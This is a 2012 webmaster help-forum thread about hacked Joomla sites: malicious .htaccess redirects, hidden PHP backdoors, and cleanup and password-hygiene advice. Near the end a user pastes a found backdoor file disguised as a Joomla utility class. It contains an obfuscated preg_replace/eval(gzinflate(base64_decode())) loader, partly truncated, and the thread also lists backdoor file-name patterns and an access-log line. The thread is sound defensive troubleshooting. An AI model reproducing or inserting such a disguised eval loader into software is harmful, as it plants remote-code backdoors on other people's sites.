Categories: Malware & hacked sites :

malware problem in my web site. it is redirect and give warning message.

Showing 1-12 of 12 messages
malware problem in my web site. it is redirect and give warning message. danbiz 1/24/12 4:13 AM
I have read the FAQs and checked for similar issues: YES / NO
My site's URL (web address) is:www.bizsecures.com
Description (including timeline of any changes made):
I verify web site and login to web master tools to after the malware problem. Now i cleaned my web site.
Now i cant give malware review in webmaster tools. it is not appear there. now in web master tools >malware tells that Google has not detected any malware on this site.
Still web site redirect  and shows warring message.
Please help me. Thanks
Re: malware problem in my web site. it is redirect and give warning message. redleg 1/24/12 4:48 AM
Unfortunately your site is still hacked, when pages on your site are requested the request redirects to a malicious site, http:// locationlook . ru /vis/index.php  that is why you get the warnings.  The most likely cause for this type of redirect is a hack of the .htaccess file.  If you have cleaned up the .htaccess file check it again to see if the malicious redirect is back??  if you have cleaned it up and it is back it means there is a backdoor on your site which is re-writing the hack code.
Re: malware problem in my web site. it is redirect and give warning message. danbiz 1/24/12 5:10 AM
How to remove backdoor from my web site?. Please help me.

Thanks.
Re: malware problem in my web site. it is redirect and give warning message. redleg 1/24/12 5:23 AM
First just to be sure I am being clear on what indicates a backdoor --  If you have previously checked the .htaccess file and found it was hacked with a malicious redirect and either removed the malicious redirect from the file  or deleted the .htaccess file and then gone back later and found that the malicious code has been added back to the .htaccess file or that the .htaccess file has been added back to your site then it is likely you have a backdoor, a file or some script the hackers have hidden on your site that is re-writing the file.

If that is what is happening on your site then suggest you read through this blog post  http://redleg-redleg.blogspot.com/2012/01/malicious-htaccess-redirect-re-written.html   which provides some tips on finding a backdoor on your site. Looking for a backdoor can be pretty tedious so you want to be sure that is what is happening before you go down that path!


Re: malware problem in my web site. it is redirect and give warning message. danbiz 1/24/12 6:17 AM
i found htaccess  redirection code in out side of public_html in the home directory.

I removed .htaccess file.

when i was scan web in http://sitecheck.sucuri.net/scanner/


it mentioned malware found url http://www.bizsecures.com/404javascript.js

but actually it is not there.

now web site is ok. http://www.bizsecures.com/

now maintain page is displays.

now i should not worry about backdoor .is that so?

 Should i follow any secure methods further?

Thanks.
Re: malware problem in my web site. it is redirect and give warning message. redleg 1/24/12 6:33 AM
No, the site is not redirecting now so looks like you are OK.  I do suggest that you monitor the content of any/all .htaccess files and make sure they stay clean and follow up with some basic security stuff --

Most hacked sites I see are due to compromised passwords.  Start by doing a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, use a couple of different security packages. Change ALL passwords especially FTP. Never store/save your passwords in your FTP client, use secure FTP if available. Install a good anti-virus program and do regular scans of your computer.  You hosting service may be able to help you pin it down, if you notify when you see any changes they could check the access logs and maybe determine the account being used when the files are modifed.

The second most common thing I see is problems with file/folder permissions.  The hackers get access to a site and open the file permissions up on a folder/file so they can continue to get access even if you change passwords etc.  You'll see different views on what permissions should be  I go with Files set to 644 Folders set to 755.  It is a good idea to regularly check file/folder permissions.

Good Luck!
Re: malware problem in my web site. it is redirect and give warning message. danbiz 1/24/12 6:37 AM
Thank you so much.

I'll follow it.
Re: malware problem in my web site. it is redirect and give warning message. sushant garg 9/11/12 10:20 AM
i have the exactly same problem say in this reply, and a malware found in /404javascript.js which is not exist in public_html can you help me to find that....
Re: malware problem in my web site. it is redirect and give warning message. Redleg x3 9/11/12 10:27 AM
@sushant garg   That means your error handling is hacked.  When a file that does not exist is requested you site (should) respond with a HTTP status code of 404 File not Found.  Your site is responding with malware, either a redirect or maybe the 404 page is hacked.
Re: malware problem in my web site. it is redirect and give warning message. sushant garg 9/13/12 12:03 PM
i am trying many no of things 
1. make a blank 404javascript.js and uplaod this it also dont dost work 
2. rename .htaccess but create a new .htaccess automatically every where
3. i checked 404.shtml file there is nothing.

what should i do to remove this please please help me .....
Re: malware problem in my web site. it is redirect and give warning message. Redleg x3 9/13/12 12:23 PM
@sushant garg

This is a very widespread hack on Joomla sites currently.  In all cases I have seen so far this has been a .htaccess hack. In all cases the hack has included a backdoor. On the sites I have seen the backdoors have been in folders like /images/stories/ or images/banners. Check through your access logs for hit like this

[04/Sep/2012:15:20:17 -0600] "POST /images/banners/.lib_l9ium8.php HTTP/1.1" 500 3950 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

Each time the file is called it makes a request to a site controlled by the hackers and the malicious code that is written to the .htaccess file is returned. The code that is returned changes regularly, sometimes it is a redirect to a malicious site (which then redirects back to google or bing), sometimes it is to a .ru site that is not currently malicious and sometimes it is a redirect directly to google.

The file names have also followed patterns like .cache_bqwn68.php .cache_boacfm.php .cache_ja3loa.php  story.php and a host of others.  Check for file names with that pattern and if you find any suspicious file check for some obfuscated php code that starts out like this preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65 .

You need to find those files, the backdoors and remove them.

Re: malware problem in my web site. it is redirect and give warning message. sushant garg 9/14/12 5:02 AM
thanks for for suggestion and i find a file named here  /public_html/mytechbox.co.in/images/banners/.cache_jyorye.php and a code /**
* Utility class for the submenu
*
* @package Joomla
*/
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'5b19fxq30jD8d/wp5C2nCw3GgJOc1DbEiWMnThM79UuSJs5NF1hg64Wlu4uxm+Pvfs+MXlbaF8Bpz3Xdz+9xGxuk0Wj0NhrNjEalXuAHIWsx64f+4LG1s1bquwNn5sedWeR2nD+cG8iLw5mr5fRGThi5MWTYH71JP5hHG43m44YNIM4sHnWmThQhxn6v13yyVR+4ztP+z41Bt7f11HXrTq/36Gm93nCe6LU5vdgLJojy0PPd6J0zAXRre97E60BVZdsNwyDs+MHQrh5fvH1b2dHyILVD+ZFdrRs5Y+em4964vRki78Te2BUQkEtfO7439uKyShs7Q6/X+XMWxG7UCWcThOG5QKg3ccv2x7OTzoeD07Ojk2O7yuxm7bEN2WveoDxMlx9Oe+VKhX1bezCYTXj7oHQUh9408p1o5EblkhOGzi3BPAjdeBZOmBd1KFHlPWP0AXBPqXodAZAgwbZZHuadtQd3aw9K................................................................9\x20\x29\x20\x3b",".");?>
class JSubMenuHelper
{
function addEntry($name, $link = '', $active = false)
{
$menu = &JToolBar::getInstance('submenu');
$menu->appendButton($name, $link, $active);
}
}
can you tell me what i have to delete there the file the code if code how much ...... 
.lib_kclcpp.php one more file find here in another website folder almost same code. 
thanks in advance.